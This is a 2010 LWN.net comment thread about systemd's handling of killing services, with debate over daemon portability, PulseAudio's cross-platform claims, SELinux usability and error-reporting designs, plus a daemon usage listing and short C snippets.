Posted Nov 20, 2010 17:40 UTC (Sat)
by pbonzini (subscriber, #60935)
[Link] (19 responses)
Posted Nov 20, 2010 18:31 UTC (Sat)
by wahern (subscriber, #37304)
[Link] (18 responses)
All of this systemd non-sense... unless and until systemd becomes available on *BSD (including OS X), why would I care? As a developer it provides nothing of value to me; I can accomplish all of these things using portable interfaces, and while there is code redundancy it's nominal. As a user, on Linux `service foo stop' should work no matter whether systemd is running. Being able to force-kill a process group (or cgroup in systemd's case, I suppose) is just QoI.
Posted Nov 20, 2010 22:04 UTC (Sat)
by slashdot (guest, #22014)
[Link]
Another fatal problem with pid files is race conditions: by the time you kill(pid), pid may be have been reassigned.
What is not really clear to me is whether systemd is the right place to do this, or whether "spawn_process_in_new_named_cgroup" and "kill_cgroup" tools would be better.
Also, putting a lot functionality in PID 1 seems silly, since the kernel will panic if it crashes: some kind of very minimal PID 1 that just spawns the real init, forwards signals to it, and restarts it, seems much better. This is probably easy to add to systemd though.
Posted Nov 21, 2010 4:04 UTC (Sun)
by foom (subscriber, #14868)
[Link] (16 responses)
Posted Nov 21, 2010 5:47 UTC (Sun)
by wahern (subscriber, #37304)
[Link] (15 responses)
Now, I always write my daemons so that by default they run in the foreground and log to stderr. But I also build in the ability to background, manage the PID, redirect logging, interpose a watchdog to restart failed processes, check a deadman switch from an interval timer to catch runaway processes, etc. You have to do all of these things to portably support those capabilities; and it's not that much work believe it or not. And that code is very reusable, for me at least. (There are libraries to do some of this but it's one of those things that is too tied up in coding style and process design to easily farm out.)
Posted Nov 21, 2010 8:07 UTC (Sun)
by tzafrir (subscriber, #11501)
[Link] (14 responses)
Posted Nov 21, 2010 19:46 UTC (Sun)
by wahern (subscriber, #37304)
[Link] (13 responses)
Posted Nov 22, 2010 2:38 UTC (Mon)
by foom (subscriber, #14868)
[Link] (12 responses)
And in the meantime (or on other platforms) you can use daemontools to do the backgrounding and such.
Posted Nov 22, 2010 3:24 UTC (Mon)
by wahern (subscriber, #37304)
[Link] (11 responses)
Great. So when I have three terminal windows open and am testing in OpenBSD, OS X, and Linux, I'll just make sure to maintain 3 different configurations for each particular tree I have checked out--which could be several per box--and evoke the relevant launchd, systemd, or daemontools command instead of relying on a consistent set of switches provided by the only application I care about at the moment.
Here are the usage switches of one of my daemons. I always provide the process management switches -d, -w, -p, -e, -u and -r in all of my daemons.
To reiterate, the problem isn't that any of these frameworks aren't comprehensive feature wise, it's that none are standard and all assume that you're running something in production. You think PostgreSQL is going to rip out their process daemonizing and process management code just because systemd is uber-cool? You think Apache HTTPd will drop its `apachectl' because launchd is available on most of the developers' laptops?
It's of course good Unix design to allow a user or administrator to use any tool they prefer to manage these things. It's another thing entirely to say that those tools displace the necessity of a daemon managing these things themselves. It's not enough to allow someone to use any other tool; a decent application should also allow no other tool.
This is why systemd is exciting for administrators but developers will hardly take notice. Those applications which depend on something like systemd will always be suspect to me. It means that the developer focused insufficiently on portability, and the odds of an application being robust and secure without being constantly and rigorously used and tested on a variety of platforms is very slight compared to those which are.
Posted Nov 22, 2010 8:15 UTC (Mon)
by nix (subscriber, #2304)
[Link] (10 responses)
Personally I will always look on this attitude with a mixture of suspicion and incomprehension: suspicion that someone came too recently from Windows, and incomprehension that anyone would want to restrict the environments in which they run so much, for the sake of saving not very many headaches in porting. I mean, I can (barely) understand it for deep magic like systemd, but emphasising the nonportability of PulseAudio remains incomprehensible to me. A better way of making sure that apps won't hurry to support your framework (it's not general, it's just another one-platform fire in the night) I cannot imagine.
Posted Nov 22, 2010 8:49 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (9 responses)
The problem is, nobody cares enough to actually use it.
Posted Nov 22, 2010 15:23 UTC (Mon)
by nye (subscriber, #51576)
[Link] (5 responses)
As Linus is fond of saying, 'code talks, bullshit walks'.
Posted Nov 22, 2010 15:37 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (4 responses)
"PulseAudio is designed for Linux systems. It has also been ported to and tested on Solaris, FreeBSD, NetBSD, MacOS X, Windows 2000 and Windows XP."
And in fact, it really works on Windows.
Posted Nov 22, 2010 16:29 UTC (Mon)
by nye (subscriber, #51576)
[Link] (3 responses)
I believe you are a liar, sir.
Posted Nov 22, 2010 16:32 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (2 responses)
Why do you think that Lennart is lying about the cross-platform design of PA?
Posted Nov 23, 2010 13:12 UTC (Tue)
by nye (subscriber, #51576)
[Link] (1 responses)
Because I use Windows as my primary desktop platform, and hence have actually tried it.
It's been years since anyone's even managed to get it to *build*, let alone work. There is one build from 2007 which can't be reproduced and is said to work after a fashion on some systems, though I've not managed to coax it into operation.
Googling for information on using PA on OS X yields some hits from last year of people pleased that they got it to compile, but not to actually work. Perhaps Google's missing some better, more recent news, but it's not looking good.
The claim on the website that PA is cross-platform is shameful.
Posted Nov 23, 2010 13:57 UTC (Tue)
by nye (subscriber, #51576)
[Link]
Posted Nov 22, 2010 18:33 UTC (Mon)
by wahern (subscriber, #37304)
[Link] (2 responses)
A piece of software will only ever get thoroughly tested on another platform if it works out-of-the box on that platform and works well. This is why when designing portable applications you have to live with certain least common denominators and spend so much time on reinventing the wheel. If it's not easy and convenient to run and use then it's not going to be well tested, period, and it's not honest to say that the environment is truly supported. It's a pragmatic consideration, but a real and substantial one nonetheless.
Dependencies always create barriers, and a meta-dependency like systemd that requires external configuration is a significant barrier, relatively speaking. It's like micro-payments. Maybe a penny is worth paying to read an article, but the marginal cost compared to zero is infinite. Furthermore, the absolute cost is mostly composed of transaction costs, not the monetary cost per se.
Posted Nov 22, 2010 22:53 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
There's nothing to gain from running PulseAudio, so there's little interest in doing it even though it's nicely portable. So this example of PulseAudio as a non-portable library is quite poor.
Posted Nov 23, 2010 0:52 UTC (Tue)
by wahern (subscriber, #37304)
[Link]
Posted Nov 21, 2010 8:57 UTC (Sun)
by epa (subscriber, #39769)
[Link]
systemd for administrators - killing services
systemd for administrators - killing services
[2] http://selinuxproject.org/page/SVirt
systemd for administrators - killing services
systemd for administrators - killing services
'non-member temp_shared_file read alert: do you want to make /tmp/* 0777 to fix? click yes and enter root password to fix'.
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
In this case, no, SELinux offers absolutely no way for users to define their own policy.
What happened to the principle of least privilege?
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
I believe that is what the phrase "mandatory access control" means. The administrators set the policy and the users have no choice but to follow it.
Right, but who says the administrator has to be the root account? If the web server runs as user apache, surely the administrator should need access only to that account - not life and death authority over everything on the machine, including all other accounts.
systemd for administrators - killing services
In this case, no, SELinux offers absolutely no way for users to define their own policy. The policy is a complex data structure loaded into the kernel. Not something you wnat users to be able to muck with.
That's... not a very good argument. You could describe the filesystem in the same way, and say that of course the system administrator is the only person who should be able to create new files, though users can fill them up. (This is just what a lot of 1950s-era operating systems did.)
systemd for administrators - killing services
systemd for administrators - killing services
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
Now we have to wait for a generation of "Well the POSIX permissions check out, so it's clearly broken, let's just switch off SELinux" to collect their pensions and be replaced by people who know to look in the logs, know how to interpret what the logs mean, etc.
No, having to look in the logs is completely insane. For a start don't you have to be root to do that?
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
if (!fwrite(fl, ...)) //An error happens
{
int err=ernno;
fclose(fl); //Whoops, we've just lost exception info.
return err;
}
I also agree that error strings suck. However, error integers suck even more.
The New Thing
You want information in program-readable format first (although perhaps augmented with some standard library code that can give a standard human-readable rendering in the user's locale), so that the program can stand to act on the information without having to parse a string.
The trouble with making a program-readable format is that you have to enumerate all possible failure modes in advance. Suppose you defined such an interface before SELinux was introduced. Now what happens when a program built against the original interface runs on a system with SELinux turned on? It could only get some catch-all 'operation failed' which is no better than the EPERM we have at the moment. At some point you have to allow for free-form error strings as a kind of escape valve to report all sorts of problems that weren't thought of when the interface was designed.
The New Thing
The New Thing
The New Thing
That's the point of exceptions - you DON'T need to enumerate everything in advance.
But if an application has no idea what an SELinuxPermissionException is (except that it is some type of PermissionException) then these type names are themselves no better than magic strings. You could print to the user 'caught SELinuxPermissionException' but how is that better than 'SELinux error: read access to file /foo/bar denied by policy PolicyXXX set in file /etc/selinux/whatever'?
The New Thing
The New Thing
struct error_report
{
uint32_t flags; /* Bitmap of common error situations */
uint32_t format; /* Tag: Format of 'details' below */
/* ... put some more common fields here ... */
union
{
char unused[PAGE_SIZE - N]; /* Set 'N' so overall struct is page sized */
struct error_report_format_0 format0;
struct error_report_format_1 format1;
/* ... add more as needed ... */
} details;
};
struct error_report_format_0
{
char message[PAGE_SIZE - N];
};
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
The New Thing
systemd for administrators - killing services
> not overwhelm the novice with too much feedback :) SELinux's answer to
> everything is EPERM! This can be infuriating when everything seems OK to a
> POSIX-educated but SELinux-ignorant user who looks at rwxr-xr-x and sees
> no problem. Disabling SELinux is the solution to a huge range of problems
> and for that reason most administrators simply disable it as policy.
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
Limiting files to those chosen by the FileChooser
Limiting files to those chosen by the FileChooser
Limiting files to those chosen by the FileChooser
Limiting files to those chosen by the FileChooser
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
> user apps. There are new problems that are going to hit us real soon that
> even the android model will not address. The new internet devices will
> need a way for the GUIs and apps to be multi user safe
> without you being able to lookup my passwords or read my email. GUI's are
> going to need to be able to function in mixed kiosk/user modes. In other
> words, users are not going to want to have to login to a device like a
> tablet every time they pick it up. For a phone, that is OK, but not for a
> tablet.
systemd for administrators - killing services
> What's wrong with Android's security model? It sounds like exactly what you want. Each application is sandboxed with only the capabilities that the user allowed it to have when it was installed.
systemd for administrators - killing services
> I believe I clearly answered that question in the section you quoted?
> Where in android is there ANY support for more than one human user?
> figuratively?
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
--kill-pid
--kill-service
systemd for administrators - killing services
systemd for administrators - killing services
systemd for administrators - killing services
$ tool --who user732
tool: assuming '--whom', as user732 is the object, not the subject of
this action.
Rewriting history
> even being able to properly kill services. systemd for the first
> time enables you to do this properly.
Rewriting history
Rewriting history
Rewriting history
Rewriting history
Rewriting history
> children of supervised processes.
> this problem in DJB's world.
Rewriting history
Rewriting history
> A properly written service will kill its own children.
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
I'm not sure if systemd and cgroups fix this, but hopefully they do.
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Usage: xera -u:Ur:Rb:BdDwWp:Pl:t:e:zZvVh [start|stop|restart]
-u, --user=USER[.GROUP] run as specific user (e.g. '_xera')
-r, --root=PATH chroot path (e.g. '/var/xera')
-b, --base=PATH base path (e.g. '/srv')
-d, --daemon run as daemon (i.e. fork into background)
-w, --watchdog use watchdog to restart daemon
-p, --pidfile=PATH path to pid file (e.g. '/var/run/xera.pid')
-l, --listen=HOST:PORT RTSP/HTTP ports (e.g. '[::1]:8000:http')
-t, --threads=N:M number of frontend and backend threads
-e, --stderr=PATH|PIPE file or command to send stderr (e.g. '|rotatelog')
-z, --timestamp timestamp log messages; default if daemon
-v, --verbose=LEVEL fatal, critical, error, warn, notice, info, debug
-V, --version print program information
-h, --help print this usage information
Solution in search of a problem
It means that the developer focused insufficiently on portability
Indeed, in Lennart's case he was explicit that he didn't care about it at all.
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
Solution in search of a problem
On a modern Unix-like system, nobody should be using pkill(1) or kill(1) to terminate daemons. That's what the init script is for; you should run '/etc/init.d/apache stop' to stop Apache, instead of manually sending signals to various processes.
He addresses this question in the comments: sometimes you do need to aggressively kill a misbehaving daemon, rather than politely asking it to stop.
Lennart Poettering does bring up a good point about badly behaved daemons that don't kill their child processes properly when you send the parent a SIGTERM signal. The correct solution to this problem is to fix the daemon so that installs a signal handler to kill and reap any child processes upon receipt of a SIGTERM signal. Having systemd automatically send a SIGTERM to each child process is not going to magically make the child process terminate cleanly.
Since even after 30 years such daemons still exist, wouldn't it be better to handle this in a single place where it can more easily be made to work? (At least as a default setting.)